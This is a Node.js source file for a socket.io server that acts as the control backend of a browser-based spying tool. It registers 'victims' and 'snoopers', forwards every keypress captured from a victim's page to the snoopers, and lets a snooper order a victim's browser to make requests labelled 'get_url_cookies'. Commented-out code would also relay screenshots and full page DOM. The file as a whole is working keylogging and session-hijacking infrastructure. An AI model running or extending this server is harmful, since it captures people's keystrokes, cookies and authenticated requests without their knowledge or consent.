#!/usr/bin/env node

if (process.argv.length !== 3) {
  console.error('invocation: ./jssrv.js <http_port>')
  process.exit(1)
}

var express = require('express')
var app = express()
var server = require('http').createServer(app)
var io = require('socket.io').listen(server)

app.use(express.static(__dirname + '/public'))

server.listen(parseInt(process.argv[2]))

var snoopers = []
var victims = []

io.sockets.on('connection', function(socket) {
  /*socket.on('screenshot', function(data) {
    // data.data
    snoopers.forEach(function(snooper) {
      snooper.emit('screenshot', {data: data.data})
    })
  })
  socket.on('fulldom', function(data) {
    snoopers.forEach(function(snooper) {
      snooper.emit('fulldom', {data: data.data})
    })
  })*/
  socket.on('keypress', function(data) {
    snoopers.forEach(function(snooper) {
      snooper.emit('keypress', data)
    })
  })
  socket.on('register_snooper', function() {
    if (victims.indexOf(socket) === -1) snoopers.push(socket)
  })
  socket.on('register_victim', function() {
    if (snoopers.indexOf(socket) === -1) victims.push(socket)
  })
  socket.on('disconnect', function() {
    var i = snoopers.indexOf(socket)
    if (i !== -1) snoopers.splice(i, 1)
    i = victims.indexOf(socket)
    if (i !== -1) victims.splice(i, 1)
  })
  socket.on('get_url_cookies', function(cmd) {
    var victim = victims[0]
    if (!victim) return
    victim.emit('trigger_request', cmd)
  })
  socket.on('request', function(data) {
    console.log('got req')
    snoopers.forEach(function(snooper) {
      console.log('sreq')
      snooper.emit('request', data)
    })
  })
})